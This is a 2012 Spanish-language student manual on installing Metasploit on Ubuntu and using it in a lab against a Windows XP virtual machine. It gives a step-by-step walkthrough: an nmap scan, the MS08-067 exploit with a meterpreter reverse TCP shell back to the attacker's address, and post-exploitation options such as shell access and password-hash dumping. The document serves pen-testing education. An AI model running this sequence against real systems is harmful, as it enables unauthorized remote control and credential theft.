-
MANUAL BSICO DEL USO DE METASPLOIT FRAMEWORK EN UBUNTU 12.10
William Caldern y Javier SenzUniversidad Nacional de
Colombia
2012
CONTENIDO
1. DEFINICIONES2. INSTALACIN3. ACTUALIZACIN3. INTERFACES4.
ATAQUE Y OPCIONES5. CONCLUSIONES
1. DEFINICIONES
METASPLOIT
Es una herramienta de software abierto de seguridad informtica
para el desarrollo, pruebas, mejora y penetracin a diversos
sistemas operativos,
Metasploit se ejecuta bajo una consola CYGWIN y trabaja con una
base de datos en la cual se encuentran toda la lista de exploits y
vulnerabilidades, lo nico que tenemos que indicarle a metasploit es
que vulnerabilidad utilizaremos, que sistema atacaremos, que tipo
de ataque utilizaremos y datos diversos que utilizar para atacar al
host.
Se llama Metasploit Framework por que es todo un entorno de
pruebas para diversas plataformas, la cual trabaja con libreras,
bases de datos, y diversos programas, shell codes, etc. Por tal
deja de ser un simple software si no un framework.
PEN-TESTING
Un Penetration Testing o Test de Penetracin, es un procedimiento
metodolgico y sistemtico en el que se simula un ataque real a una
red o sistema, con el fin de descubrir y reparar sus problemas de
seguridad
-
2. INSTALACIN
Descargamos directamente de la pgina oficial el instalador de
Metasploit Framework dando click en el siguiente enlace
http://www.metasploit.com/download/ y escogiendo la versin 32 bits
o 64 bits segn sea el caso.
Vamos a una Terminal y escribimos
chmod +x metasploit-latest-linux-x64-installer.runsudo
./metasploit-latest-linux-x64-installer.run
http://www.metasploit.com/download/
-
3. ACTUALIZACIN
Despus de terminar la instalacin (varios Siguientes y Finalizar)
procedemos a actualizar el framework.
De nuevo en la Terminal escribimos
sudo msfupdate
y esperamos a que finalice con
Updated to revision XXXXX.
-
4. INTERFACES
4.1 MODO GUI
Escribimos
sudo msfgui
4.2 MODO CONSOLA
Escribimossudo msfconsole
-
5. ATAQUE Y OPCIONES
Trabajaremos nuestro metasploit por medio de la consola y
directamente en un ataque a un Windows XP SP3 instalado como mquina
virtual con el firewall desactivado.
Inicialmente y antes de abrir nuestro metasploit debemos
escanear nuestra red LAN.
sudo nmap -O 192.168.0.1/24
Tenemos como resultado
Starting Nmap 6.00 ( http://nmap.org ) at 2012-11-29 01:27 COT
Nmap scan report for 192.168.0.18 Host is up (0.00050s latency).
Not shown: 997 closed ports PORT STATE SERVICE VERSION 135/tcp open
msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open
microsoft-ds Microsoft Windows XP microsoft-ds MAC Address:
08:00:27:A2:3F:80 (Cadmus Computer Systems) Device type: general
purpose Running: Microsoft Windows XP|2003 OS CPE:
cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 OS
details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop Service Info: OS: Windows; CPE:
cpe:/o:microsoft:windows
Host script results: |_nbstat: NetBIOS name: USUARIO-7A1D458,
NetBIOS user: , NetBIOS MAC: 08:00:27:a2:3f:80 (Cadmus Computer
Systems) |_smbv2-enabled: Server doesn't support SMBv2 protocol |
smb-security-mode: | Account that was used for smb scripts: guest |
User-level authentication | SMB Security: Challenge/response
passwords supported |_ Message signing disabled (dangerous, but
default) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN
Manager) | Computer name: usuario-7a1d458 | NetBIOS computer name:
USUARIO-7A1D458 | Workgroup: GRUPO_TRABAJO |_ System time:
2012-11-29 01:27:20 UTC-5
TRACEROUTE HOP RTT ADDRESS 1 0.50 ms 192.168.0.18
Como se puede ver, el puerto 445 se encuentra abierto, y existe
un exploit que permite hacer uso de este puerto para controlar ese
sistema remotamente.
-
Ahora, vamos al METASPLOIT en modo consola
sudo msfconsole
Podemos inicialmente ver la cantidad de exploits existentes en
el framework con:
show exploits
Teniendo en cuenta la informacin obtenida con NMAP es bien
sabido que el puerto 445 se puede atacar con el exploit
ms08_067_netapi. Escribimos
search exploit ms08_067_netapi
Teniendo como resultado el lugar donde se guarda el exploit.
Matching Modules ================
Name Disclosure Date Rank Description ---- --------------- ----
----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00
UTC great Microsoft Server Service Relative Path Stack
Corruption
-
Escogemos el exploit
use exploit/windows/smb/ms08_067_netapi
Acto seguido debemos elegir el PAYLOAD (lo que queremos recibir
despus de realizar el ataque). Podemos elegir bind shells o reverse
shells. Existe tambin el payload llamado METERPRETER (definir).
Para ver los payloads existentesshow payloads
Digitamos el comando para elegir nuestro payload.
set payload windows/meterpreter/reverse_tcp
-
Ahora que informacin especfica requiere el exploit y el
payload?
show options
Hace falta RHOST (direccin IP de la vctima) y LHOST (direccin IP
del atacante)
Tenemos la IP de la vctima:
-
Definimos entonces
set RHOST 192.168.0.18set LHOST 192.168.0.5
Y ATACAMOS
exploit
Tenemos control de la mquina !!
-
Vemos las diversas opciones de METERPRETER.
meterpreter> help
Por lo que vemos existen muchas opciones, tales como SHELL
(obtenemos un CMD de la mquina), HASHDUMP (obtenemos los hash de
las claves de usuario del sistema), SCREENSHOT (tomamos un
pantallazo de la mquina), entre muchos otros.
SHELL
HASHDUMP
-
IFCONFIG (verificamos que estamos dentro)
5. CONCLUSIONES
Metasploit es una herramienta muy til para realizar diferentes
pruebas a un sistema y de esta manera identificar debilidades.
Al ser una herramienta de software libre nos permite realizar
modificaciones al cdigo fuente y mantener siempre actualizada la
herramienta.
Debido a que es una herramienta de libre acceso se presta para
que usuarios malintencionados hagan mal uso de la misma.
Para la realizacin de una auditoria de un sistema se debe
realizar inicialmente un Information Gathering para despus saber
que ataque realizar. Es necesario decirle a la Metasploit que tipo
de ataque usar o de lo contrario no tendr efectividad.